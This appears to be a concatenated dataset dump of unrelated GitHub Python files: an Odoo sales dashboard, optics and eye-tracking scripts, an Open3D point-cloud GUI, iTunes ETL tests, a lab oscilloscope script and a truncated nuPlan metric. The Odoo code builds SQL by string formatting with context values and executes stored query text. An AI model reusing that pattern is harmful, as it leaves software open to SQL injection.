'hsn': len(complete_data.get('hsn', 0) if complete_data.get('hsn', 0) != 0 else []),\n 'not_validated': len(complete_data.get('not_validated', 0) if complete_data.get('not_validated', 0) != 0 else []),\n 'no_email': len(complete_data.get('no_email', 0) if complete_data.get('no_email', 0) != 0 else []),\n 'ready': len(complete_data.get('ready', 0) if complete_data.get('ready', 0) != 0 else []),\n 'partially': len(complete_data.get('partially', 0) if complete_data.get('partially', 0) != 0 else []),\n 'amendment': len(complete_data.get('amendment', 0) if complete_data.get('amendment', 0) != 0 else []),\n 'color': random.choice([1, 2, 3, 4, 5, 6, 7, 8, 9])\n }\n )\n\n def execute_management_query(self, query_model):\n list_query_dict = {}\n company_id = self.env.user.company_id.id\n query = str(query_model[\"query\"]) + str(company_id)\n if query:\n self.env.cr.execute(query)\n list_query_dict = self.env.cr.dictfetchall()\n return list_query_dict\n\n @api.model\n def create_card_for_sales_user(self):\n model_names = []\n users = self.env[\"res.users\"].search([(\"id\", \">\", 0)])\n names = self.env[\"sales.dashboard.query\"].search([(\"id\", \">\", 0)])\n for name in names:\n model_names.append(name.model_name)\n model_names = set(model_names)\n for user in users:\n for company in user.company_ids:\n for name in model_names:\n self.env['sales.dashboard'].create({\"name\": name, \"user_id\": user.id,\n \"company_id\": company.id})\n\n @api.multi\n def compute_by_scheduler(self):\n return {\n 'type': 'ir.actions.window',\n 'tag': 'reload',\n }\n\n @api.multi\n def get_list_view(self):\n obj_list = []\n result = {}\n label_name = self._context.get(\"label_name\")\n self.env.cr.execute(\"select * from sales_dashboard_query where model_name='%s' and label_name='%s'\" % (str(self.name), label_name))\n model_data = self.env.cr.dictfetchall()\n if model_data:\n total_data = self.execute_management_query(model_data[0])\n if total_data:\n name = self.name\n if name in ['pick', 'pack', 'dispatch']:\n name = 'stock.picking'\n if name == 'sale.order' and label_name == 'amendment':\n name = 'sale.order.amend.new'\n for obj in total_data:\n obj_list.append(self.env[name].search([(\"id\", \"=\", obj[\"id\"])]).id)\n if self.name:\n if self.name == 'sale.order':\n if label_name == 'amendment':\n action = self.env.ref('crm_extension.action_sale_order_amend_new')\n else:\n action = self.env.ref('crm_extension.action_orders_new')\n elif self.name == 'res.partner':\n action = self.env.ref('base.action_partner_form')\n elif self.name == 'pick':\n action = self.env.ref('crm_extension.action_picking_so_transfer')\n elif self.name == 'pack':\n action = self.env.ref('crm_extension.action_picking_arkes_pack')\n elif self.name == 'dispatch':\n action = self.env.ref('crm_extension.action_picking_arkes_dispatch_advice')\n else:\n action = self.env[\"ir.actions.act_window\"].search([(\"res_model\", \"=\", self.name)])\n if self.name == 'sale.quotation':\n res = self.env.ref('crm_extension.sale_quotation_tree').id\n res_form = self.env.ref('crm_extension.sale_quotation_form').id\n elif self.name == 'sale.order':\n if label_name == 'amendment':\n res = self.env.ref('crm_extension.sale_order_amend_new_tree').id\n res_form = self.env.ref('crm_extension.sale_order_amend_new_form').id\n else:\n res = self.env.ref('sale.view_order_tree').id\n res_form = self.env.ref('sale.view_order_form').id\n elif self.name == 'res.partner':\n res = self.env.ref('base.view_partner_tree').id\n res_form = self.env.ref('base.view_partner_form').id\n elif self.name == 'pick':\n res = self.env.ref('crm_extension.so_transfer_new_tree').id\n res_form = self.env.ref('crm_extension.view_stock_picking_transfer_so_form').id\n elif self.name == 'pack':\n res = self.env.ref('crm_extension.so_transfer_new_tree').id\n res_form = self.env.ref('crm_extension.view_stock_picking_pack_new_form').id\n elif self.name == 'dispatch':\n res = self.env.ref('crm_extension.so_transfer_new_tree').id\n res_form = self.env.ref('crm_extension.view_stock_picking_pack_new_form').id\n else:\n res = self.env[\"ir.ui.view\"].search([(\"model\", \"=\", self.name), (\"type\", \"in\", (\"list\", \"tree\"))])[0].id\n res_form = self.env[\"ir.ui.view\"].search([(\"model\", \"=\", self.name), (\"type\", \"=\", \"form\")])[0].id\n result = action[0].read()[0]\n result['views'] = [(res, 'list'), (res_form, 'form')]\n result['domain'] = [('id', 'in', obj_list)]\n result['target'] = 'current'\n return result\n\n @api.multi\n def change_view_type(self):\n self.view_type = self._context.get(\"view_type\")\n\n\nclass SalesDashboardQuery(models.Model):\n _description = \"Query Detail\"\n _name = \"sales.dashboard.query\"\n\n model_name = fields.Char(\"Model Name\")\n label_name = fields.Char(\"Label Name\")\n query = fields.Text(\"Query\")\n col_name = fields.Char(\"Column Name\")\n\n @api.model\n def create(self, vals):\n if 'model_name' in vals and vals.get('model_name') and 'label_name' in vals and vals.get(\n 'label_name') and 'query' in vals and vals.get('query'):\n data = self.env[\"sales.dashboard.query\"].search(\n [('model_name', '=', vals.get('model_name')), ('label_name', '=', vals.get('label_name')),\n ('query', '=', vals.get('query'))])\n if data:\n raise ValidationError(\"Record Already Exist....\")\n\n res = super(SalesDashboardQuery, self).create(vals)\n\n user_dict = []\n names = []\n dynamic_db = self.env['sales.dashboard']\n objs = self.env[\"sales.dashboard\"].search([('id', '>', 0)], order='id desc')\n for unique in objs:\n\n if {'user_id': unique.user_id.id, 'company_id': unique.company_id.id} not in user_dict:\n user_dict.append({'user_id': unique.user_id.id, 'company_id': unique.company_id.id})\n\n if unique.name not in names:\n names.append(unique.name)\n if res.model_name not in names:\n for dict in user_dict:\n dynamic_db.create({'name': res.model_name,\n 'user_id': dict['user_id'],\n 'company_id': dict['company_id']})\n return res\n\n\nclass SalesDashboardUser(models.Model):\n _name = \"res.users\"\n _inherit = \"res.users\"\n\n @api.model\n def create(self, values):\n model_names = []\n # print(\"new user\")\n res = super(SalesDashboardUser, self).create(values)\n names = self.env[\"sales.dashboard.query\"].search([(\"id\", \">\", 0)])\n for name in names:\n model_names.append(name.model_name)\n model_names = set(model_names)\n for company in res.company_ids:\n for name in model_names:\n self.env['sales.dashboard'].sudo().create({\"name\": name, \"user_id\": res.id,\n \"company_id\": company.id})\n return res\n\n @api.multi\n def write(self, values):\n model_names = []\n if \"company_ids\" in values:\n if values.get(\"company_ids\")[0][2]:\n for company_id in values.get(\"company_ids\")[0][2]:\n dashboard = self.env['sales.dashboard'].search([(\"user_id\",\"=\", self.id), (\"company_id\",\"=\", company_id)])\n if len(dashboard) == 0:\n names = self.env[\"sales.dashboard.query\"].search([(\"id\", \">\", 0)])\n for name in names:\n model_names.append(name.model_name)\n model_names = set(model_names)\n for name in model_names:\n self.env['sales.dashboard'].sudo().create({\"name\": name, \"user_id\": self.id,\n \"company_id\": company_id})\n\n res = super(SalesDashboardUser, self).write(values)\n return res\n\n","repo_name":"sharmatriloknath/Dashboards","sub_path":"sales_dashboard/models/sales_dashboard.py","file_name":"sales_dashboard.py","file_ext":"py","file_size_in_byte":12744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"39437090580","text":"#!/usr/bin/python\n\"\"\"\nA simple example\n\"\"\"\nfrom raypier.sources import ParallelRaySource\nfrom raypier.tracer import RayTraceModel\nfrom raypier.troughs import TroughParabloid\nimport numpy\n\n#\nsource = ParallelRaySource(origin=(0,20,0),\n direction=(0,-1,1),\n working_dist = 10.,\n #number=20,\n radius=1.)\n\n#print source.InputDetailRays.origin.shape\n \nm1 = TroughParabloid(width = 20,\n length = 100,\n EFL = 5,\n centre = (0,0,0))\n \nprint(m1.intersect)\n \nmodel = RayTraceModel(optics=[m1,],\n sources=[source,],\n probes=[],\n recursion_limit=2)\n \n#model.trace_detail_async()\n#import time\n#start = time.clock()\n#model.trace_all()\n#end = time.clock()\n#print \"traced in\", end - start \n\nmodel.configure_traits()\n","repo_name":"bryancole/raypier_optics","sub_path":"examples/troughtest.py","file_name":"troughtest.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"50"} +{"seq_id":"71633591835","text":"import cv2\nimport numpy as np\nimport math\nfrom usb import mouse\nfrom camera import camera\nfrom ml import gaze_estimation, eye_status\nfrom tools import speed_test, input_check, utils\nfrom config import *\n\nSCREEN_WIDTH_INCHES = 23.375\nSCREEN_HEIGHT_INCHES = 13.25\nINVERSE_SCREEN_WIDTH_INCHES = 0.04278\nINVERSE_SCREEN_HEIGHT_INCHES = 0.07547\nDISTANCE_TO_SCREEN_INCHES = 30\nPI_OVER_180 = 0.01745\n\ndef main():\n cam = camera.Camera()\n\n gaze_model = gaze_estimation.GazeEstimator(config[\"models_path\"] + config[\"gaze_estimation_models\"])\n eye_model = eye_status.EyeStatusEstimator(config[\"models_path\"] + config[\"eye_status_models\"])\n\n speed_tester = speed_test.SpeedTest()\n\n while(True):\n frame = cam.get_frame()\n frame = prepare_frame(frame)\n\n eye_status_result = eye_model.run(frame)\n\n if eye_status_result[0] == 1 and eye_status_result[1] == 1:\n gaze_estimation_result = gaze_model.run(frame)\n # print(\"x=%6.2f\" %gaze_estimation_result[0], \"y=%6.2f\" %gaze_estimation_result[1])\n\n x, y = get_pos(gaze_estimation_result)\n print(\"x=%6.2f\" %x, \"y=%6.2f\" %y)\n # mouse.move(x, y)\n else:\n # print(\"eye/s closed\")\n pass\n\n speed_tester.loop()\n\n if input_check.check(\"q\"):\n break\n\n cam.release()\n\n\ndef cleanup():\n input_check.exit()\n\n\ndef prepare_frame(img):\n\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n\n img = img[41:56, 16:-16]\n left = img[:, :30]\n right = img[:, -30:]\n eyes = np.concatenate((left, right), axis=1)\n\n eyes = eyes / 255.0\n\n return eyes\n\n\ndef get_pos(angles):\n np.array(angles)\n angles = angles * PI_OVER_180\n\n from_middle_x = DISTANCE_TO_SCREEN_INCHES * utils.fast_tan(angles[0])\n from_middle_y = DISTANCE_TO_SCREEN_INCHES * utils.fast_tan(angles[1])\n\n x = from_middle_x * INVERSE_SCREEN_WIDTH_INCHES + .5\n y = from_middle_y * INVERSE_SCREEN_HEIGHT_INCHES + .5\n\n x = np.clip(x, 0, 1)\n y = np.clip(y, 0, 1)\n\n return x, y\n\n\nif __name__ == \"__main__\":\n try:\n main()\n finally:\n cleanup()","repo_name":"WillMeagher/eye_tracking_device","sub_path":"run/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"27625195672","text":"import os.path\nimport sys\nimport numpy as np\nimport open3d as o3d\nimport open3d.visualization.gui as gui\nimport open3d.visualization.rendering as rendering\n\nimport time\nimport rospy\nfrom sensor_msgs.msg import PointCloud2\nimport sensor_msgs.point_cloud2 as pc2\nimport pcl #sudo apt install python3-pcl\nimport ros_numpy #sudo apt-get install ros-noetic-ros-numpy\n\nimport pyransac3d as pyrsc #pip3 install pyransac3d\nimport flattten_pcd as fp\n\nprint(\"Project\")\nprint(\"python version\", sys.version)\nprint(\"open3d version\", o3d.__version__)\n\nclass WindowApp:\n \n def __init__(self):\n\n rospy.init_node(\"move_group_python_interface_tutorial\", anonymous=True)\n rospy.Subscriber('/cloud2', PointCloud2, self.callback)\n self.point_cloud = o3d.geometry.PointCloud()\n\n self.window = gui.Application.instance.create_window(\"xARM6\", 1400, 900)\n w = self.window\n\n # member variables\n self.model_dir = \"\"\n self.model_name = \"\"\n\n em = w.theme.font_size\n # 3D Widget\n self._widget3d = gui.SceneWidget()\n self._widget3d.scene = rendering.Open3DScene(w.renderer)\n self._widget3d.set_view_controls(gui.SceneWidget.Controls.ROTATE_CAMERA)\n # create a frame that encapsulates the Scenewidget\n self._widget3d.frame = gui.Rect(500, w.content_rect.y,\n 900, w.content_rect.height)\n #mesh = o3d.geometry.TriangleMesh.create_sphere()\n #mesh.compute_vertex_normals()\n self.material = rendering.MaterialRecord()\n self.material.shader = \"defaultLit\"\n #_widget3d.scene.add_geometry('mesh', mesh, material)\n self._widget3d.scene.set_background([200, 0, 0, 200]) # not working?!\n self._widget3d.scene.camera.look_at([0, 0, 0], [1, 1, 1], [0, 0, 1])\n self._widget3d.set_on_mouse(self._on_mouse_widget3d)\n\n # gui layout\n gui_layout = gui.Vert(0, gui.Margins(0.5 * em, 0.5 * em, 0.5 * em, 0.5 * em))\n # create frame that encapsulates the gui\n gui_layout.frame = gui.Rect(w.content_rect.x, w.content_rect.y,\n 500, w.content_rect.height)\n # File-chooser widget\n self._fileedit = gui.TextEdit()\n filedlgbutton = gui.Button(\"scan\")\n filedlgbutton.horizontal_padding_em = 0.5\n filedlgbutton.vertical_padding_em = 0\n filedlgbutton.set_on_clicked(self._on_filedlg_button)\n\n\n scanbutton = gui.Button(\"scan\")\n scanbutton.horizontal_padding_em = 1\n scanbutton.vertical_padding_em = 1\n scanbutton.set_on_clicked(self._on_scan_button)\n\n fileedit_layout = gui.Horiz()\n fileedit_layout.add_child(gui.Label(\"Model file\"))\n fileedit_layout.add_child(self._fileedit)\n fileedit_layout.add_fixed(0.25 * em)\n fileedit_layout.add_child(filedlgbutton)\n # add to the top-level (vertical) layout\n gui_layout.add_child(fileedit_layout)\n\n w.add_child(gui_layout)\n w.add_child(self._widget3d)\n\n def _on_mouse_widget3d(self, event):\n #print(event.type)\n return gui.Widget.EventCallbackResult.IGNORED\n\n def _on_filedlg_button(self):\n # filedlg = gui.FileDialog(gui.FileDialog.OPEN, \"Select file\", self.window.theme)\n # filedlg.add_filter(\".obj .ply .stl\", \"Triangle mesh (.obj, .ply, .stl)\")\n # filedlg.add_filter(\"\", \"All files\")\n # filedlg.set_on_cancel(self._on_filedlg_cancel)\n # filedlg.set_on_done(self._on_filedlg_done)\n # self.window.show_dialog(filedlg)\n if self._widget3d.scene.has_geometry('cloud2') :\n self._widget3d.scene.remove_geometry('cloud2')\n self._widget3d.scene.add_geometry('cloud2', self.point_cloud, self.material)\n\n #o3d.io.write_point_cloud(\"point_pipe.pcd\", self.point_cloud)\n pcd2 = fp.get_flattened_pcds2(source=self.point_cloud,A=0,B=1,C=0,D=0,x0=0,y0=1000,z0=0)\n center, normal, radius, inliers = fp.get_cylinder(pcd2, thresh=0.1, maxIteration=1)\n mesh_cylinder = fp.get_clylinder_mesh(pcd2,center, normal, radius, inliers)\n if self._widget3d.scene.has_geometry('cylinder') :\n self._widget3d.scene.remove_geometry('cylinder')\n self._widget3d.scene.add_geometry('cylinder', mesh_cylinder, self.material)\n print(\"center: \" + str(center))\n print(\"radius: \" + str(radius))\n print(\"vecC: \" + str(normal))\n print(\"inliers: \", inliers)\n # cil = pyrsc.Cylinder()\n # points = np.asarray(self.point_cloud.points)\n \n # center, normal, radius, inliers = cil.fit(points, thresh=0.02)\n # print(\"center: \" + str(center))\n # print(\"radius: \" + str(radius))\n # print(\"vecC: \" + str(normal))\n # R = pyrsc.get_rotationMatrix_from_vectors([0, 0, 1], normal)\n\n # plane = self.point_cloud.select_by_index(inliers).paint_uniform_color([1, 0, 0])\n # not_plane = self.point_cloud.select_by_index(inliers, invert=True)\n # mesh = o3d.geometry.TriangleMesh.create_coordinate_frame(origin=[0, 0, 0], size=0.2)\n # cen = o3d.geometry.TriangleMesh.create_coordinate_frame(origin=center, size=0.5)\n # mesh_rot = copy.deepcopy(mesh).rotate(R, center=[0, 0, 0])\n\n # mesh_cylinder = o3d.geometry.TriangleMesh.create_cylinder(radius=radius, height=0.5)\n # mesh_cylinder.compute_vertex_normals()\n # mesh_cylinder.paint_uniform_color([0.1, 0.9, 0.1])\n # mesh_cylinder = mesh_cylinder.rotate(R, center=[0, 0, 0])\n # mesh_cylinder = mesh_cylinder.translate((center[0], center[1], center[2]))\n \n # self._widget3d.scene.add_geometry('mesh', mesh_cylinder, self.material)\n\n def _on_filedlg_cancel(self):\n self.window.close_dialog()\n\n def _on_filedlg_done(self, path):\n self._fileedit.text_value = path\n self.model_dir = os.path.normpath(path)\n # load model\n self.window.close_dialog()\n \n def _on_scan_button(self):\n self._widget3d.scene.add_geometry('cloud2', self.point_cloud, self.material)\n \n def callback(self, ros_cloud):\n self.point_cloud.points = o3d.utility.Vector3dVector(ros_numpy.point_cloud2\n .pointcloud2_to_xyz_array(ros_cloud))\n\n\ndef main():\n \n gui.Application.instance.initialize()\n w = WindowApp()\n gui.Application.instance.run()\n\nif __name__ == \"__main__\":\n main()","repo_name":"Shinjinok/xarm_pipe","sub_path":"example/open3dGuiExemple2.py","file_name":"open3dGuiExemple2.py","file_ext":"py","file_size_in_byte":6400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"73841825434","text":"# pyright: strict\n\nimport polars as pl\nfrom hypothesis import given, settings\nfrom hypothesis import strategies as st\nfrom polars.testing import assert_frame_equal\n\nfrom itunes_etl import fetch_metadata, lookup_itunes_id, wikidata_itunes_all_ids\n\n\ndef setup_module() -> None:\n pl.enable_string_cache()\n\n\ndef teardown_module() -> None:\n pl.disable_string_cache()\n\n\n_RESULT_DTYPE = pl.Struct(\n [\n pl.Field(\"id\", pl.UInt64),\n pl.Field(\"type\", pl.Utf8),\n pl.Field(\"name\", pl.Utf8),\n pl.Field(\"url\", pl.Utf8),\n pl.Field(\"kind\", pl.Utf8),\n ]\n)\n\n\n@given(\n batch_size=st.integers(min_value=1, max_value=11),\n)\n@settings(deadline=None)\ndef test_lookup_itunes_id(batch_size: int) -> None:\n lf1 = pl.LazyFrame(\n {\n \"id\": [\n 909253,\n 1,\n 1440768692,\n 1440768764,\n 909253,\n 102225079,\n 1438674900,\n 284910350,\n 1676858107,\n None,\n 6446905902,\n ]\n },\n schema={\"id\": pl.UInt64},\n ).with_columns(\n pl.col(\"id\")\n .pipe(lookup_itunes_id, country=\"us\", batch_size=batch_size)\n .alias(\"result\"),\n )\n lf2 = pl.LazyFrame(\n {\n \"id\": [\n 909253,\n 1,\n 1440768692,\n 1440768764,\n 909253,\n 102225079,\n 1438674900,\n 284910350,\n 1676858107,\n None,\n 6446905902,\n ],\n \"result\": [\n {\n \"id\": 909253,\n \"type\": \"Artist\",\n \"name\": \"Jack Johnson\",\n \"url\": \"https://music.apple.com/\"\n \"us/artist/jack-johnson/909253?uo=4\",\n },\n None,\n {\n \"id\": 1440768692,\n \"type\": \"Album\",\n \"name\": \"In Between Dreams\",\n \"url\": \"https://music.apple.com/\"\n \"us/album/in-between-dreams/1440768692?uo=4\",\n },\n {\n \"id\": 1440768764,\n \"kind\": \"song\",\n \"name\": \"Banana Pancakes\",\n \"url\": \"https://music.apple.com/\"\n \"us/album/banana-pancakes/1440768692?i=1440768764&uo=4\",\n },\n {\n \"id\": 909253,\n \"type\": \"Artist\",\n \"name\": \"Jack Johnson\",\n \"url\": \"https://music.apple.com/\"\n \"us/artist/jack-johnson/909253?uo=4\",\n },\n {\n \"id\": 102225079,\n \"type\": \"TV Show\",\n \"name\": \"The Office\",\n \"url\": \"https://itunes.apple.com/\"\n \"us/tv-show/the-office/id102225079?uo=4\",\n },\n {\n \"id\": 1438674900,\n \"type\": \"TV Season\",\n \"name\": \"The Office: The Complete Series\",\n \"url\": \"https://itunes.apple.com/\"\n \"us/tv-season/the-office-the-complete-series/id1438674900?uo=4\",\n },\n {\n \"id\": 284910350,\n \"kind\": \"software\",\n \"name\": \"Yelp: Food, Delivery & Reviews\",\n \"url\": \"https://apps.apple.com/\"\n \"us/app/yelp-food-delivery-reviews/id284910350?uo=4\",\n },\n {\n \"id\": 1676858107,\n \"kind\": \"feature-movie\",\n \"name\": \"Avatar: The Way of Water\",\n \"url\": \"https://itunes.apple.com/\"\n \"us/movie/avatar-the-way-of-water/id1676858107?uo=4\",\n },\n None,\n {\n \"id\": 6446905902,\n \"kind\": \"ebook\",\n \"name\": \"Make Something Wonderful\",\n \"url\": \"https://books.apple.com/\"\n \"us/book/make-something-wonderful/id6446905902?uo=4\",\n },\n ],\n },\n schema={\"id\": pl.UInt64, \"result\": _RESULT_DTYPE},\n )\n assert lf1.schema[\"result\"] == _RESULT_DTYPE\n assert_frame_equal(lf1, lf2)\n\n\ndef test_lookup_itunes_id_empty() -> None:\n df1 = pl.DataFrame({\"id\": []}, schema={\"id\": pl.UInt64}).with_columns(\n pl.col(\"id\").pipe(lookup_itunes_id, country=\"us\").alias(\"result\")\n )\n df2 = pl.DataFrame({\"id\": [], \"result\": []}, schema=df1.schema)\n assert_frame_equal(df1, df2)\n\n\ndef test_fetch_metadata() -> None:\n lf1 = (\n pl.LazyFrame(\n {\n \"id\": [\n 909253,\n 1,\n 1440768692,\n 1440768764,\n 909253,\n 102225079,\n 1438674900,\n 284910350,\n 1676858107,\n 6446905902,\n ]\n },\n schema={\"id\": pl.UInt64},\n )\n .pipe(fetch_metadata)\n .select(\"id\", \"type\", \"kind\", \"url\", \"us_country\", \"ca_country\", \"any_country\")\n )\n lf2 = pl.LazyFrame(\n {\n \"id\": [\n 909253,\n 1,\n 1440768692,\n 1440768764,\n 909253,\n 102225079,\n 1438674900,\n 284910350,\n 1676858107,\n 6446905902,\n ],\n \"type\": [\n \"Artist\",\n None,\n \"Album\",\n None,\n \"Artist\",\n \"TV Show\",\n \"TV Season\",\n None,\n None,\n None,\n ],\n \"kind\": [\n None,\n None,\n None,\n \"song\",\n None,\n None,\n None,\n \"software\",\n \"feature-movie\",\n \"ebook\",\n ],\n \"url\": [\n \"https://music.apple.com/us/artist/jack-johnson/909253?uo=4\",\n None,\n \"https://music.apple.com/us/album/in-between-dreams/1440768692?uo=4\",\n \"https://music.apple.com/\"\n \"us/album/banana-pancakes/1440768692?i=1440768764&uo=4\",\n \"https://music.apple.com/us/artist/jack-johnson/909253?uo=4\",\n \"https://itunes.apple.com/us/tv-show/the-office/id102225079?uo=4\",\n \"https://itunes.apple.com/\"\n \"us/tv-season/the-office-the-complete-series/id1438674900?uo=4\",\n \"https://apps.apple.com/\"\n \"us/app/yelp-food-delivery-reviews/id284910350?uo=4\",\n \"https://itunes.apple.com/\"\n \"us/movie/avatar-the-way-of-water/id1676858107?uo=4\",\n \"https://books.apple.com/\"\n \"us/book/make-something-wonderful/id6446905902?uo=4\",\n ],\n \"us_country\": [True, False, True, True, True, True, True, True, True, True],\n \"ca_country\": [\n True,\n False,\n True,\n True,\n True,\n True,\n False,\n True,\n True,\n True,\n ],\n \"any_country\": [\n True,\n False,\n True,\n True,\n True,\n True,\n True,\n True,\n True,\n True,\n ],\n },\n schema={\n \"id\": pl.UInt64,\n \"type\": pl.Categorical,\n \"kind\": pl.Categorical,\n \"url\": pl.Utf8,\n \"us_country\": pl.Boolean,\n \"ca_country\": pl.Boolean,\n \"any_country\": pl.Boolean,\n },\n )\n assert_frame_equal(lf1, lf2)\n\n\ndef test_wikidata_itunes_all_ids() -> None:\n ldf = wikidata_itunes_all_ids()\n assert ldf.schema == {\"id\": pl.UInt64}\n ldf.collect()\n","repo_name":"josh/wikidatabots","sub_path":"test_itunes_etl.py","file_name":"test_itunes_etl.py","file_ext":"py","file_size_in_byte":8307,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"18604283283","text":"import sys, os\nsys.path.append(os.path.pardir)\nfrom six.moves import input\n\nfrom vxi11.tools import TDS5000B\n\ndef haltif(cond, msg=None):\n if cond:\n if msg is None:\n msg = 'Press enter to continue'\n input(msg)\n return cond\n\ndef main():\n\n NUM_AVERAGES = 10\n NUM_DATA_POINTS = 51\n\n # a Windows XP path used on the scope (which runs Windows)\n FDIR = 'w:\\\\rubidium\\\\data\\\\2008\\\\Jul\\\\23\\\\test'\n channels = ['CH3'] # array of channels to save data from\n\n scope = TDS5000B(host='rbscope')\n scope.read_timeout = 10000 # in ms\n\n pre_cmds = dict()\n post_cmds = dict()\n# pre_cmds[0] = 'CH3:SCALE .5' # before 0th iteration, execute this\n# pre_cmds[8] = 'CH3:SCALE .2' # before 8th iteration, execute this\n# pre_cmds[16] = 'CH3:SCALE .1' # before 16th iteration, execute this\n# post_cmds[16] = ('CH3:SCALE .1', 'CH4:SCALE .2') # multiple commands tuple\n# post_cmds[16] = ['CH3:SCALE .1', 'CH4:SCALE .2'] # multiple commands list\n\n\n #* ********** BEGIN EXPERIMENT PROGRAM ********* */\n scope.getStatusByte() # clear status byte.\n scope.send([\n 'SAVE:WAVEFORM:FILEFORMAT SPREADSHEETTXT', # set waveform save format\n 'ACQUIRE:STATE STOP', # stop whatever\n 'ACQUIRE:STOPAFTER SEQUENCE', # set to single shot.\n 'DATA:START 1', # start trace at beginning\n 'DATA:STOP 10000000', # make sure that we get the entire trace.\n 'FILESYSTEM:CWD \\\"' + FDIR + '\\\"' # set working dir\n ])\n\n\n msg = [\"Going to save: \"]\n for chi in channels:\n msg.append('%s ' %chi)\n msg.append('\\nto files in \\'%s\\'' %FDIR)\n print(''.join(msg))\n input('Press enter to continue!')\n\n print('Ready to accumulate', str(NUM_AVERAGES),\n 'averages of', str(NUM_DATA_POINTS), 'data scans')\n\n\n if scope.printErrors('Setup Error -- CHECK AFS TOKENS'):\n return\n\n for n in range(0,NUM_AVERAGES):\n iter = -1\n while iter < NUM_DATA_POINTS:\n iter += 1\n # set pre acquire commands.\n if iter in pre_cmds:\n scope.send(pre_cmds[iter])\n\n if haltif(scope.printErrors('pre_cmd'),'Press enter to redo last!'):\n iter -= 1\n continue\n\n # Acquire\n scope.send('ACQUIRE:STATE RUN')\n scope.waitforACQStop()\n if haltif(scope.printErrors('ACQUIRE'),'Press enter to redo last!'):\n iter -= 1\n continue\n \n\n # set POST acquire commands.\n if iter in post_cmds:\n scope.send(post_cmds[iter])\n\n if haltif(scope.printErrors('post_cmd'),'Press enter to redo last!'):\n iter -= 1\n continue\n\n print('Average/Iteration # %(n)d/%(i)d' %{'n':n, 'i':iter})\n\n\n\n # now save all the needed waveforms\n OutDir = '%(d)s\\\\%(i).4d' %{'d':FDIR, 'i':iter} \n MkOutDir = 'FILESYSTEM:MKDIR \\\"%(od)s\\\"' %{'od':OutDir} \n save_cmds = []\n for chi in channels:\n save_cmds.append(\n 'SAVE:WAVEFORM %(c)s,\\\"%(d)s\\\\scope-%(c)s-%(n).4d.txt\\\"' \\\n %{'c':chi, 'd':OutDir, 'n':n}\n )\n\n if save_cmds != []:\n scope.send(MkOutDir)\n scope.clearStatusByte() # clear+ignore status byte\n scope.send(save_cmds); # save\n\n if haltif(scope.printErrors('SAVE:WAVEFORM -- CHECK AFS TOKENS'),\n 'Press enter to redo last!'):\n iter -= 1\n continue\n\n\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"olsonse/python-vxi11","sub_path":"examples/gather_traces.py","file_name":"gather_traces.py","file_ext":"py","file_size_in_byte":3756,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"24242523364","text":"import statistics\nfrom dataclasses import dataclass\nfrom typing import List, Optional\n\nfrom nuplan.common.actor_state.ego_state import EgoState\nfrom nuplan.common.maps.abstract_map_objects import GraphEdgeMapObject\nfrom nuplan.common.maps.maps_datatypes import SemanticMapLayer\nfrom nuplan.planning.metrics.abstract_metric import AbstractMetricBuilder\nfrom nuplan.planning.metrics.metric_result import MetricStatistics, MetricViolation\nfrom nuplan.planning.metrics.utils.metric_violation_aggregator import aggregate_metric_violations\nfrom nuplan.planning.simulation.history.simulation_history import SimulationHistory\n\n\n@dataclass\nclass GenericViolation:\n \"\"\" Class used to keep track of violations, contains the depth of violation as well as their timestamp.\"\"\"\n timestamp: int\n violation_depths: List[float]\n\n\n@dataclass\nclass RoadElementAndSpeedLimit:\n road_element: GraphEdgeMapObject\n speed_limit_mps: float\n\n\nclass SpeedLimitViolationExtractor:\n def __init__(self, history: SimulationHistory, metric_name: str, category: str, statistics_name: str) -> None:\n self.history = history\n self.open_violation: Optional[GenericViolation] = None\n self.violations: List[MetricViolation] = []\n self.last_element_and_speed_limit: Optional[RoadElementAndSpeedLimit] = None\n\n self.metric_name = metric_name\n self.category = category\n self.statistics_name = statistics_name\n\n def extract_metric(self) -> None:\n \"\"\" Extracts the drivable area violations from the history of Ego poses. \"\"\"\n for sample in self.history.data:\n ego_state = sample.ego_state\n timestamp = sample.iteration.time_us\n\n violation = self._get_speed_limit_violation(ego_state, sample.iteration.time_us)\n if violation:\n if not self.open_violation:\n self.start_violation(violation)\n else:\n self.update_violation(violation)\n elif not violation and self.open_violation:\n self.end_violation(timestamp, higher_is_worse=True)\n # End all violations\n if self.open_violation:\n self.end_violation(self.history.data[-1].iteration.time_us)\n\n def start_violation(self, violation: GenericViolation) -> None:\n \"\"\"\n Opens the violation window of the given IDs, as they now starting to violate the metric\n\n :param violation: The current violation\n \"\"\"\n self.open_violation = violation\n\n def update_violation(self, violation: GenericViolation) -> None:\n \"\"\"\n Updates the violation if the maximum depth of violation is greater than the current maximum\n\n :param violation: The current violation\n \"\"\"\n assert isinstance(self.open_violation, GenericViolation), \"There is no open violation, cannot update it!\"\n self.open_violation.violation_depths.extend(violation.violation_depths)\n\n def end_violation(self, timestamp: int, higher_is_worse: bool = True) -> None:\n \"\"\"\n Closes the violation window, as Ego re-enters the non-violating regime\n\n :param timestamp: The current timestamp\n :param higher_is_worse: True if the violation gravity is monotonic increasing with violation depth\n\n \"\"\"\n assert isinstance(self.open_violation, GenericViolation), \"There is no open violation, cannot end it!\"\n maximal_violation = max(self.open_violation.violation_depths) if higher_is_worse else min(\n self.open_violation.violation_depths)\n\n self.violations.append(MetricViolation(name=self.statistics_name,\n metric_computator=self.metric_name,\n metric_category=self.category,\n unit=\"meters\",\n start_timestamp=self.open_violation.timestamp,\n duration=timestamp - self.open_violation.timestamp,\n extremum=maximal_violation,\n mean=statistics.mean(self.open_violation.violation_depths)))\n self.open_violation = None\n\n def _get_speed_limit_no_prior(self, ego_state: EgoState) -> Optional[RoadElementAndSpeedLimit]:\n \"\"\"\n Gets the current lane or lane connector, along with its speed limit.\n :param ego_state: State of ego\n :returns: An object with the current map element and speed limit, None if none is found\n 